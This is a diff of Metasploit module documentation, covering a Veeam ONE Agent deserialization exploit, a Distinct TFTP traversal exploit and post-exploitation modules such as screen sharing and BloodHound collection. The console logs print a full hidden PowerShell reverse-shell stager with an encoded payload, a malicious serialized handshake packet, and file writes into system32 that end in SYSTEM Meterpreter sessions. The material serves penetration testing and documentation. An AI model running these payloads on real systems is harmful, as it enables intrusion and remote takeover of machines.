+  [*] 172.16.191.140:113 - Trying Windows XP SP0/1 - English using address at 0x71aa1a97 ...
+  [*] Sending stage (176195 bytes) to 172.16.191.140
+  [*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.140:1040) at 2020-05-23 00:00:56 -0400
+
+  meterpreter > sysinfo 
+  Computer        : WINXP
+  OS              : Windows XP (5.1 Build 2600).
+  Architecture    : x86
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/windows
+  meterpreter > 
+  ```

documentation/modules/exploit/windows/misc/veeam_one_agent_deserialization.md

@@ -0,0 +1,122 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a .NET deserialization vulnerability in the Veeam
+ONE Agent before the hotfix versions 9.5.5.4587 and 10.0.1.750 in the
+9 and 10 release lines.
+
+Specifically, the module targets the `HandshakeResult()` method used by
+the Agent. By inducing a failure in the handshake, the Agent will
+deserialize untrusted data.
+
+Tested against the pre-patched release of 10.0.0.750. Note that Veeam
+continues to distribute this version but with the patch pre-applied.
+
+### Setup
+
+1. Download the [pre-patched 10.0.0.750 ISO](https://download2.veeam.com/VeeamONE.10.0.0.750.iso)
+2. Mount the ISO in a 64-bit copy of Windows (I used Windows 10 x64)
+3. Run `Setup.exe` and follow the prompts to install the software
+
+You can reference Veeam's [quick start guide](https://helpcenter.veeam.com/docs/one/qsg/installation.html?ver=100).
+
+The service may take up to several minutes to start, even if you can
+connect to it, so please be patient.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Windows command.
+
+### 1
+
+This uses a Windows dropper to execute code.
+
+### 2
+
+This uses a PowerShell stager to execute code.
+
+## Options
+
+### HOSTINFO_NAME
+
+This is the name sent in the host info packet to the server. It must be
+recognized by the server. You shouldn't need to change this, but you may
+if your environment is different.
+
+## Scenarios
+
+### Veeam ONE Agent 10.0.0.750 on Windows 10 x64
+
+```
+msf5 > use exploit/windows/misc/veeam_one_agent_deserialization
+msf5 exploit(windows/misc/veeam_one_agent_deserialization) > options
+
+Module options (exploit/windows/misc/veeam_one_agent_deserialization):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   HOSTINFO_NAME  AgentController  yes       Name to send in host info (must be recognized by server!)
+   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT          2805             yes       The target port (TCP)
+   SRVHOST        0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT        8080             yes       The local port to listen on.
+   SSL            false            no        Negotiate SSL for incoming connections
+   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                         no        The URI to use for this exploit (default is random)
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST                      yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   PowerShell Stager
+
+
+msf5 exploit(windows/misc/veeam_one_agent_deserialization) > set rhosts 172.16.249.150
+rhosts => 172.16.249.150
+msf5 exploit(windows/misc/veeam_one_agent_deserialization) > set lhost 172.16.249.1
+lhost => 172.16.249.1
+msf5 exploit(windows/misc/veeam_one_agent_deserialization) > run
+
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] 172.16.249.150:2805 - Connecting to 172.16.249.150:2805
+[*] 172.16.249.150:2805 - Sending host info to 172.16.249.150:2805
+[+] 172.16.249.150:2805 - --> Host info packet: "\x05\x02\x0FAgentController"
+[+] 172.16.249.150:2805 - <-- Host info reply: "\x03\x02\x00"
+[*] 172.16.249.150:2805 - Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
+[*] 172.16.249.150:2805 - Powershell command length: 2506
+[*] 172.16.249.150:2805 - Serializing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPbHp14CA7VWa2+bSBT9nEj5D6iyZFAcG7tOmo1UacGGGNekpgTbsWutMIxh6mEgMMQm3f73vWNDmm7T3XalRUjM4z7PPTOXdU49hmMqkAvh88nx0dhN3UgQa+jCbAi1RNcd6egI1mu73QpdCm8FcaEkST+OXEyXV1e9PE0RZYd58xoxJctQtCIYZaIk/ClMQ5Sis/erT8hjwmeh9kfzmsQrl5RiRc/1QiScKdTne6PYc3kwTTshmIn1jx/r0uKsvWxq97lLMrFuFxlDUdMnpC4JXyTu8LZIkFg3sZfGWbxmzSmmrztNh2buGt2AtQdkIhbGflaXIA14U8TylAqHhLiFw75Yh+E4jT3F91OUZfWGsOC2F8vl7+KidPwhpwxHqGlQhtI4sVH6gD2UNQcu9Qn6gNZL0LJZimmwlCQQe4g3SKzRnJCG8CtmxBu0rWD7WSXxuRJIjVkqNaCULyVqxn5O0EG1/kKkvP4SPBUHALsvJ8cnx+uKLnl4/5wvMDpa7McIohPHcYb3Ym8FuSGY4MZlcVrAtHab5khaPmEr1ArLafxYvV3JguSK0PEA1haTGPtL0CkrWgu9aYev/5iZfbTGFPUL6kbYq8gnvoQyWhO0T7FZid1AVGK93EB+HxEUuIzDxov9nZoWYfakq+aY+ChVPKhUBlFBEaVvgzlUQqwb1EQRYHSYA/tqa6A8qqRLmheVdz4HoXqPuFnWEMY5nDmvIdjIJchvCArNcLml5CzeD+tfwzVzwrDnZqwyt5QqHEt/vZhmLM09KBvkfmsnyMMu4VA0hAH2kVrYOKj81l8EoucSAgcBLD1AIWCFA2AzToYUQuSFl5o2YkaUEBSByP7s68QN4KSXbN+Txw2QX/97gBWZD8zlUFQYPAsP6muTmDWECU4ZXCEc1j2L/pP7Z5fHPpBeispKiNX5WKgF47Su7db3JOCcLHHZo5AyQEBP40h1M3TRPVwU4quWhvvn4378qMCj6R+siWo7k7lh+kNiG8y+0/DICUMDt40A5oWjBWMmJ+9ubwdDuz9Q0v4uXCtGZmgDtbDaquIN8JvJUHUc0MO9kfVpZyi+GgWz4K63NcbhzABHvVFgBPBVjdBT5bkcqLLeG9lqqGFZCWxrYHXbc6N1SVT8aBu2Mpg++Xvyo3W7g9nuVrkxh0qov/f1dkff62+4/nxzPepr+7nH59ZdpmEN/Gj6nTUJ0XSSqFNNn1uTxAhOt4E1GbW6eqjCuoF3o8RuwdNuDx+o/2iSy0cTwrUm8yFGcyNARaBYimLfUWKvtj1F1b1U7Z8rju7A2ubWoDtrlZh+cTdo/TYxMUpixdIURSdwJiPF3fZb7Wn8zpqcW44m7wpH3m21T62thofbTfl1ri8ugta6O25NbIMO3FCFeIthd4OHp7AXuRP5bt2acPz6Gm090hlxx712TFattoP7b1TVwGh4Y3rkXoWcwca5tYp7HS9cQ0xGcGkFs5h23A3YnQYKRAf5QZ3XQwN01JzgjXM647aGWzka7mQeZzS8hNg6ZQwKo8asBfEpg77do9e2Mev4SFdbp97bV5y0wNpaFD642TMy/qiVmG6ahS4BkkKLqK4GPU718tYfx5hriCL8LGxQShGBVgvNuDpeCiGxx3sO7w7Q7g5NiPdEB4avOy+OJOFJUPraiaqlq6s5hAjHdX+gmiNEAxY25N1rWYbOIu+6MiT583n14qQQD7YavDUdoHkyT/bmJX6Sa/f3xv8JWXl5hPDx/wWyr2v/sPtTMMqNMuHv1r9d+CVMfzHxqYsZyNlw9RF0aL4v5l+y49nPCVQEKr8uH/57+T5nZzfwy3Jy/BfBhjzkyAoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+[*] 172.16.249.150:2805 - Sending malicious handshake to 172.16.249.150:2805
+[+] 172.16.249.150:2805 - --> Handshake packet: "\x9E\f\x00\x00\a\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF\x01\x00\x00\x00\x00\x00\x00\x00\f\x02\x00\x00\x00^Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\x05\x01\x00\x00\x00BMicrosoft.VisualStudio.Text.Formatting.TextFormattingRunProperties\x01\x00\x00\x00\x0FForegroundBrush\x01\x02\x00\x00\x00\x06\x03\x00\x00\x00\xBC\x17<ResourceDictionary xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\" xmlns:X=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns:S=\"clr-namespace:System;assembly=mscorlib\" xmlns:D=\"clr-namespace:System.Diagnostics;assembly=system\"><ObjectDataProvider X:Key=\"\" ObjectType=\"{X:Type D:Process}\" MethodName=\"Start\"><ObjectDataProvider.MethodParameters><S:String>cmd</S:String><S:String>/c powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPbHp14CA7VWa2+bSBT9nEj5D6iyZFAcG7tOmo1UacGGGNekpgTbsWutMIxh6mEgMMQm3f73vWNDmm7T3XalRUjM4z7PPTOXdU49hmMqkAvh88nx0dhN3UgQa+jCbAi1RNcd6egI1mu73QpdCm8FcaEkST+OXEyXV1e9PE0RZYd58xoxJctQtCIYZaIk/ClMQ5Sis/erT8hjwmeh9kfzmsQrl5RiRc/1QiScKdTne6PYc3kwTTshmIn1jx/r0uKsvWxq97lLMrFuFxlDUdMnpC4JXyTu8LZIkFg3sZfGWbxmzSmmrztNh2buGt2AtQdkIhbGflaXIA14U8TylAqHhLiFw75Yh+E4jT3F91OUZfWGsOC2F8vl7+KidPwhpwxHqGlQhtI4sVH6gD2UNQcu9Qn6gNZL0LJZimmwlCQQe4g3SKzRnJCG8CtmxBu0rWD7WSXxuRJIjVkqNaCULyVqxn5O0EG1/kKkvP4SPBUHALsvJ8cnx+uKLnl4/5wvMDpa7McIohPHcYb3Ym8FuSGY4MZlcVrAtHab5khaPmEr1ArLafxYvV3JguSK0PEA1haTGPtL0CkrWgu9aYev/5iZfbTGFPUL6kbYq8gnvoQyWhO0T7FZid1AVGK93EB+HxEUuIzDxov9nZoWYfakq+aY+ChVPKhUBlFBEaVvgzlUQqwb1EQRYHSYA/tqa6A8qqRLmheVdz4HoXqPuFnWEMY5nDmvIdjIJchvCArNcLml5CzeD+tfwzVzwrDnZqwyt5QqHEt/vZhmLM09KBvkfmsnyMMu4VA0hAH2kVrYOKj81l8EoucSAgcBLD1AIWCFA2AzToYUQuSFl5o2YkaUEBSByP7s68QN4KSXbN+Txw2QX/97gBWZD8zlUFQYPAsP6muTmDWECU4ZXCEc1j2L/pP7Z5fHPpBeispKiNX5WKgF47Su7db3JOCcLHHZo5AyQEBP40h1M3TRPVwU4quWhvvn4378qMCj6R+siWo7k7lh+kNiG8y+0/DICUMDt40A5oWjBWMmJ+9ubwdDuz9Q0v4uXCtGZmgDtbDaquIN8JvJUHUc0MO9kfVpZyi+GgWz4K63NcbhzABHvVFgBPBVjdBT5bkcqLLeG9lqqGFZCWxrYHXbc6N1SVT8aBu2Mpg++Xvyo3W7g9nuVrkxh0qov/f1dkff62+4/nxzPepr+7nH59ZdpmEN/Gj6nTUJ0XSSqFNNn1uTxAhOt4E1GbW6eqjCuoF3o8RuwdNuDx+o/2iSy0cTwrUm8yFGcyNARaBYimLfUWKvtj1F1b1U7Z8rju7A2ubWoDtrlZh+cTdo/TYxMUpixdIURSdwJiPF3fZb7Wn8zpqcW44m7wpH3m21T62thofbTfl1ri8ugta6O25NbIMO3FCFeIthd4OHp7AXuRP5bt2acPz6Gm090hlxx712TFattoP7b1TVwGh4Y3rkXoWcwca5tYp7HS9cQ0xGcGkFs5h23A3YnQYKRAf5QZ3XQwN01JzgjXM647aGWzka7mQeZzS8hNg6ZQwKo8asBfEpg77do9e2Mev4SFdbp97bV5y0wNpaFD642TMy/qiVmG6ahS4BkkKLqK4GPU718tYfx5hriCL8LGxQShGBVgvNuDpeCiGxx3sO7w7Q7g5NiPdEB4avOy+OJOFJUPraiaqlq6s5hAjHdX+gmiNEAxY25N1rWYbOIu+6MiT583n14qQQD7YavDUdoHkyT/bmJX6Sa/f3xv8JWXl5hPDx/wWyr2v/sPtTMMqNMuHv1r9d+CVMfzHxqYsZyNlw9RF0aL4v5l+y49nPCVQEKr8uH/57+T5nZzfwy3Jy/BfBhjzkyAoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"</S:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>\v"
+[+] 172.16.249.150:2805 - <-- Handshake reply: "\x00\x00\x00\x00\xBA\xB0\x8DJ\xA2A\eL\x9E\xD3r\xB4w\xD3\xEFn\x0E\x00\x00\x00\a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00"
+[*] Sending stage (201283 bytes) to 172.16.249.150
+[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.150:49725) at 2020-04-28 01:06:47 -0500
+
+meterpreter > getuid
+Server username: WINDEV2004EVAL\User
+meterpreter > sysinfo
+Computer        : WINDEV2004EVAL
+OS              : Windows 10 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 21
+Meterpreter     : x64/windows
+meterpreter >
+```

documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md

@@ -0,0 +1,229 @@
+## Vulnerable Application
+
+  This module exploits a directory traversal vulnerability in the TFTP
+  Server component of Distinct Intranet Servers version 3.10 which
+  allows a remote attacker to write arbitrary files to the server file
+  system, resulting in code execution under the context of 'SYSTEM'.
+  This module has been tested successfully on TFTP Server version 3.10
+  on Windows XP SP3 (EN).
+
+  Download:
+
+  * https://www.exploit-db.com/apps/00064d0e83691e64ec1b1f8f25627010-Intranet-Servers-310-Setup.exe
+
+## Verification Steps
+
+  Setup:
+
+  1. Install Distinct Intranet Servers
+  2. Launch TFTP Server
+  3. Select `Configure` -> `TFTP` from the application menu
+  4. Set the root directory to `C:\\some\\path`
+  5. Check `Enable TFTP Server`
+  6. Pres `OK` to apply settings
+
+  Exploitation:
+
+  1. Start `msfconsole`
+  2. `use exploit/windows/tftp/distinct_tftp_traversal`
+  3. `set RHOSTS <rhost>`
+  4. `set DEPTH 10`
+  5. `run`
+  6. You should receive a session
+
+
+## Options
+
+  ### DEPTH
+
+  Levels to reach base directory. (Default: `10`)
+
+
+## Scenarios
+
+  ### Microsoft Windows XP SP3 (EN)
+
+  ```
+  msf5 > use exploit/windows/tftp/distinct_tftp_traversal 
+  msf5 exploit(windows/tftp/distinct_tftp_traversal) > set rhosts 172.16.191.205
+  rhosts => 172.16.191.205
+  msf5 exploit(windows/tftp/distinct_tftp_traversal) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Sending EXE (73802 bytes)
+  [*] Started TFTP client listener on 0.0.0.0:6867
+  [*] Listening for incoming ACKs
+  [*] WRQ accepted, sending the file.
+  [*] Source file: (Data), destination file: ../../../../../../../../../../\WINDOWS\system32\kRzdfnrUu.exe
+  [*] Sending 73802 bytes (145 blocks)
+  [*] Sent 512 bytes in block 1
+  [*] Sent 512 bytes in block 2
+  [*] Sent 512 bytes in block 3
+  [*] Sent 512 bytes in block 4
+  [*] Sent 512 bytes in block 5
+  [*] Sent 512 bytes in block 6
+  [*] Sent 512 bytes in block 7
+  [*] Sent 512 bytes in block 8
+  [*] Sent 512 bytes in block 9
+  [*] Sent 512 bytes in block 10
+  [*] Sent 512 bytes in block 11
+  [*] Sent 512 bytes in block 12
+  [*] Sent 512 bytes in block 13
+  [*] Sent 512 bytes in block 14
+  [*] Sent 512 bytes in block 15
+  [*] Sent 512 bytes in block 16
+  [*] Sent 512 bytes in block 17
+  [*] Sent 512 bytes in block 18
+  [*] Sent 512 bytes in block 19
+  [*] Sent 512 bytes in block 20
+  [*] Sent 512 bytes in block 21
+  [*] Sent 512 bytes in block 22
+  [*] Sent 512 bytes in block 23
+  [*] Sent 512 bytes in block 24
+  [*] Sent 512 bytes in block 25
+  [*] Sent 512 bytes in block 26
+  [*] Sent 512 bytes in block 27
+  [*] Sent 512 bytes in block 28
+  [*] Sent 512 bytes in block 29
+  [*] Sent 512 bytes in block 30
+  [*] Sent 512 bytes in block 31
+  [*] Sent 512 bytes in block 32
+  [*] Sent 512 bytes in block 33
+  [*] Sent 512 bytes in block 34
+  [*] Sent 512 bytes in block 35
+  [*] Sent 512 bytes in block 36
+  [*] Sent 512 bytes in block 37
+  [*] Sent 512 bytes in block 38
+  [*] Sent 512 bytes in block 39
+  [*] Sent 512 bytes in block 40
+  [*] Sent 512 bytes in block 41
+  [*] Sent 512 bytes in block 42
+  [*] Sent 512 bytes in block 43
+  [*] Sent 512 bytes in block 44
+  [*] Sent 512 bytes in block 45
+  [*] Sent 512 bytes in block 46
+  [*] Sent 512 bytes in block 47
+  [*] Sent 512 bytes in block 48
+  [*] Sent 512 bytes in block 49
+  [*] Sent 512 bytes in block 50
+  [*] Sent 512 bytes in block 51
+  [*] Sent 512 bytes in block 52
+  [*] Sent 512 bytes in block 53
+  [*] Sent 512 bytes in block 54
+  [*] Sent 512 bytes in block 55
+  [*] Sent 512 bytes in block 56
+  [*] Sent 512 bytes in block 57
+  [*] Sent 512 bytes in block 58
+  [*] Sent 512 bytes in block 59
+  [*] Sent 512 bytes in block 60
+  [*] Sent 512 bytes in block 61
+  [*] Sent 512 bytes in block 62
+  [*] Sent 512 bytes in block 63
+  [*] Sent 512 bytes in block 64
+  [*] Sent 512 bytes in block 65
+  [*] Sent 512 bytes in block 66
+  [*] Sent 512 bytes in block 67
+  [*] Sent 512 bytes in block 68
+  [*] Sent 512 bytes in block 69
+  [*] Sent 512 bytes in block 70
+  [*] Sent 512 bytes in block 71
+  [*] Sent 512 bytes in block 72
+  [*] Sent 512 bytes in block 73
+  [*] Sent 512 bytes in block 74
+  [*] Sent 512 bytes in block 75
+  [*] Sent 512 bytes in block 76
+  [*] Sent 512 bytes in block 77
+  [*] Sent 512 bytes in block 78
+  [*] Sent 512 bytes in block 79
+  [*] Sent 512 bytes in block 80
+  [*] Sent 512 bytes in block 81
+  [*] Sent 512 bytes in block 82
+  [*] Sent 512 bytes in block 83
+  [*] Sent 512 bytes in block 84
+  [*] Sent 512 bytes in block 85
+  [*] Sent 512 bytes in block 86
+  [*] Sent 512 bytes in block 87
+  [*] Sent 512 bytes in block 88
+  [*] Sent 512 bytes in block 89
+  [*] Sent 512 bytes in block 90
+  [*] Sent 512 bytes in block 91
+  [*] Sent 512 bytes in block 92
+  [*] Sent 512 bytes in block 93
+  [*] Sent 512 bytes in block 94
+  [*] Sent 512 bytes in block 95
+  [*] Sent 512 bytes in block 96
+  [*] Sent 512 bytes in block 97
+  [*] Sent 512 bytes in block 98
+  [*] Sent 512 bytes in block 99
+  [*] Sent 512 bytes in block 100
+  [*] Sent 512 bytes in block 101
+  [*] Sent 512 bytes in block 102
+  [*] Sent 512 bytes in block 103
+  [*] Sent 512 bytes in block 104
+  [*] Sent 512 bytes in block 105
+  [*] Sent 512 bytes in block 106
+  [*] Sent 512 bytes in block 107
+  [*] Sent 512 bytes in block 108
+  [*] Sent 512 bytes in block 109
+  [*] Sent 512 bytes in block 110
+  [*] Sent 512 bytes in block 111
+  [*] Sent 512 bytes in block 112
+  [*] Sent 512 bytes in block 113
+  [*] Sent 512 bytes in block 114
+  [*] Sent 512 bytes in block 115
+  [*] Sent 512 bytes in block 116
+  [*] Sent 512 bytes in block 117
+  [*] Sent 512 bytes in block 118
+  [*] Sent 512 bytes in block 119
+  [*] Sent 512 bytes in block 120
+  [*] Sent 512 bytes in block 121
+  [*] Sent 512 bytes in block 122
+  [*] Sent 512 bytes in block 123
+  [*] Sent 512 bytes in block 124
+  [*] Sent 512 bytes in block 125
+  [*] Sent 512 bytes in block 126
+  [*] Sent 512 bytes in block 127
+  [*] Sent 512 bytes in block 128
+  [*] Sent 512 bytes in block 129
+  [*] Sent 512 bytes in block 130
+  [*] Sent 512 bytes in block 131
+  [*] Sent 512 bytes in block 132
+  [*] Sent 512 bytes in block 133
+  [*] Sent 512 bytes in block 134
+  [*] Sent 512 bytes in block 135
+  [*] Sent 512 bytes in block 136
+  [*] Sent 512 bytes in block 137
+  [*] Sent 512 bytes in block 138
+  [*] Sent 512 bytes in block 139
+  [*] Sent 512 bytes in block 140
+  [*] Sent 512 bytes in block 141
+  [*] Sent 512 bytes in block 142
+  [*] Sent 512 bytes in block 143
+  [*] Sent 512 bytes in block 144
+  [*] Sent 74 bytes in block 145
+  [*] Transferred 73802 bytes in 145 blocks, upload complete!
+  [*] Sending MOF (2221 bytes)
+  [*] Started TFTP client listener on 0.0.0.0:59069
+  [*] Listening for incoming ACKs
+  [*] WRQ accepted, sending the file.
+  [*] Source file: (Data), destination file: ../../../../../../../../../../\WINDOWS\system32\wbem\mof\OEEXjgTIL.mof
+  [*] Sending 2221 bytes (5 blocks)
+  [*] Sent 512 bytes in block 1
+  [*] Sent 512 bytes in block 2
+  [*] Sent 512 bytes in block 3
+  [*] Sent 512 bytes in block 4
+  [*] Sent 173 bytes in block 5
+  [*] Transferred 2221 bytes in 5 blocks, upload complete!
+  [*] Sending stage (176195 bytes) to 172.16.191.205
+  [*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.205:1247) at 2020-05-14 00:43:03 -0400
+  [!] This exploit may require manual cleanup of 'kRzdfnrUu.exe' on the target
+  [!] This exploit may require manual cleanup of 'wbem\mof\good\OEEXjgTIL.mof' on the target
+
+  meterpreter > 
+  [+] Deleted wbem\mof\good\OEEXjgTIL.mof
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > 
+  ```
+

documentation/modules/module_doc_template.md

@@ -4,7 +4,9 @@ functioning in 5+ years, so giving links or specific examples can be VERY helpfu
 
 ## Vulnerable Application
 
-Instructions to get the vulnerable application.  If applicable, include links to the vulnerable install files, as well as instructions on installing/configuring the environment if it is different than a standard install. Much of this will come from the PR, and can be copy/pasted.
+Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
+files, as well as instructions on installing/configuring the environment if it is different than a
+standard install. Much of this will come from the PR, and can be copy/pasted.
 
 ## Verification Steps
   Example steps in this format (is also in the PR):
@@ -14,13 +16,13 @@ Instructions to get the vulnerable application.  If applicable, include links to
   3. Do: ```use [module path]```
   4. Do: ```run```
   5. You should get a shell.
- 
+
 ## Options
-List each option and how to use it. 
+List each option and how to use it.
 
 ### Option Name
 
-Talk about what it does, and how to use it appropriately.  If the default value is likely to change, include the default value here.
+Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
 
 ## Scenarios
 Specific demo of using the module that might be useful in a real world scenario.

documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md

@@ -11,6 +11,14 @@
   This work is based on zhangyoufu's [unifi-backup-decrypt](https://github.com/zhangyoufu/unifi-backup-decrypt)
   and justingist's [POSH-Ubiquiti](https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1).  
 
+  The unf file has the following actions performed:
+
+  1. Decrypt the file
+  2. Fix the zip file if a `zip` utility is on the system
+  3. Extract db.gz
+  4. Unzip the db file
+  5. Import the db file
+
 ### Install Instructions
 
   1. Download the file from https://www.ui.com/download/unifi (Java required on Windows)

documentation/modules/post/multi/manage/screensaver.md

@@ -15,7 +15,7 @@ The following platforms are supported:
 ## Verification Steps
 
 1. Obtain a session.
-2. In msfconsole do `use post/multi/screensaver`.
+2. In msfconsole do `use post/multi/manage/screensaver`.
 3. Set the `SESSION` option.
 4. Choose the action you want to perform via `set action NAME` (available actions described below).
 5. Do `run`.

documentation/modules/post/multi/manage/screenshare.md

@@ -0,0 +1,19 @@
+This module allows you to view and control the screen of the target computer via a local browser window. The module continually screenshots the target screen and also relays all mouse and keyboard events to session.
+
+## Target sessions
+
+This module only supports some target sessions, where the keyboard, mouse and screenshot API are supported.
+
+* Windows (e.g windows/meterpreter/*)
+* OSX (e.g osx/x64/meterpreter/*)
+* Java (e.g java/meterpreter/*)
+
+## Verification Steps
+
+1. Obtain a native OSX or Windows session (or a Java session).
+2. In msfconsole do `use post/multi/manage/screenshare`.
+3. Set the `SESSION` option.
+4. Do `run`.
+5. Open the page in a javascript enabled browser
+
+

documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md

@@ -1,4 +1,5 @@
-## Overview
+## Vulnerable Application
+
 This is a post exploitation module for local privilege escalation bug
 which exists in Microsoft COM for windows when it fails to properly
 handle serialized objects.
@@ -7,29 +8,32 @@ handle serialized objects.
 * https://github.com/codewhitesec/UnmarshalPwn/
 * https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824
 
-## Options
-
-"COMMAND" This command will be executed on successful escalation.</br>
-"SESSION" The session to run this module on.
-
-## Limitations
+### Limitations
 
 The payload will not spawn ant independent session it simply creates process with the system privilege.
 If the system is not vulnerable, then payload will execute but new process will not spawn.
 
 ## Verification Steps
 
-If you want to confirm the vulnerability before you add user or perform any other sensitive action. 
+If you want to confirm the vulnerability before you add user or perform any other sensitive action.
 
-1. `set COMMAND /s notepad.exe` 
-2. `run` 
+1. `set COMMAND /s notepad.exe`
+2. `run`
 
 Confirmation:
 
 Then go to meterpreter session and confirm running process (ps)
 If you see notepad.exe running as SYSYEM then that is as indication of vulnerable system.
 
-## Usage
+## Options
+
+### COMMAND
+
+This command will be executed on successful escalation.</br>
+
+## Scenarios
+
+### Windows 10 (Build 15063)
 
 ```
 meterpreter > sysinfo

documentation/modules/post/windows/gather/bloodhound.md

@@ -0,0 +1,111 @@
+## Vulnerable Application
+
+  This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more. With this information BloodHound will easily identify highly complex privilage elevation attack paths that would otherwise be impossible to quickly identify within an Active Directory environment.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get meterpreter session
+  3. Do: `use post/windows/gather/bloodhound`
+  4. Do: `set SESSION <session id>`
+  5. Do: `run`
+  6. You should be able to see that the module is running a powershell in the target machine
+  7. You should be ablte to see, after few minutes, that the module created a loot with the BloodHound results in zip format
+
+## Options
+
+  **CollectionMethode**
+
+  The collection method to use. This parameter accepts a comma separated list of values. Accepted values are Default, Group, LocalAdmin, RDP, DCOM, GPOLocalGroup, Session, ObjectProps, ComputerOnly, LoggedOn, Trusts, ACL, Container, DcOnly, All. The default method is Default.
+
+  **Domain**
+
+  Specifies the domain to enumerate. If not specified, will enumerate the current domain your user context specifies.
+
+  **SearchForest**
+
+  Expands data collection to include all domains in the forest. The default value is false.
+  
+  **Stealth**
+
+  Use stealth collection options, will sacrifice data quality in favor of much reduced network impact. The default value is false.
+
+  **SkipGCDeconfliction**
+
+  Skips Global Catalog deconfliction during session enumeration. This option can result in more inaccuracy in data. The default value is false.
+
+  **ExcludeDC**
+
+  Exclude domain controllers from session queries. Useful for ATA environments which detect this behavior. The default value is false.
+ 
+  **OU**
+
+  Limit enumeration to this OU. Takes a DistinguishedName.
+
+  **DomainController**
+
+  Specify which Domain Controller to request data from. Defaults to closest DC using Site Names.
+  
+  **LdapPort**
+
+  Override the port used to connect to LDAP. The default value is false.
+  
+  **SecureLdap**
+
+  Uses LDAPs instead of unencrypted LDAP on port 636. The default value is false.
+  
+  **IgnoreLdapCert**
+
+  Ignores the certificate for LDAP. The default value is false.
+
+  **LDAPUser**
+
+  User to connect to LDAP with.
+  
+  **LDAPPass**
+
+  Password for user you are connecting to LDAP with.
+
+  **DisableKerbSigning**
+
+  Disables Kerberos Signing on requests. The default value is false.
+
+  **Threads**
+
+  Specifies the number of threads to use during enumeration. The default value is 10.
+
+  **PingTimeout**
+
+  Specifies timeout for ping requests to computers in milliseconds. The default value is 259.
+
+  **SkipPing**
+
+  Skip all ping checks for computers. This option will most likely be slower as API calls will be made to all computers regardless of being up Use this option if ping is disabled on the network for some reason. The default value is false.
+
+  **LoopDelay**
+
+  Amount of time to wait between session enumeration loops in minutes. This option should be used in conjunction with the SessionLoop enumeration method. The default value is 300.
+  
+  **MaxLoopTime**
+
+  Length of time to run looped session collection. Format: 0d0h0m0s or any variation of this format. Use in conjunction with -CollectionMethod SessionLoop. Default will loop for two hours.
+
+## Expected Output
+
+```
+meterpreter > run post/windows/gather/bloodhound
+
+[*] Using URL: http://0.0.0.0:8080/bvqUdtHUQ4De1O3
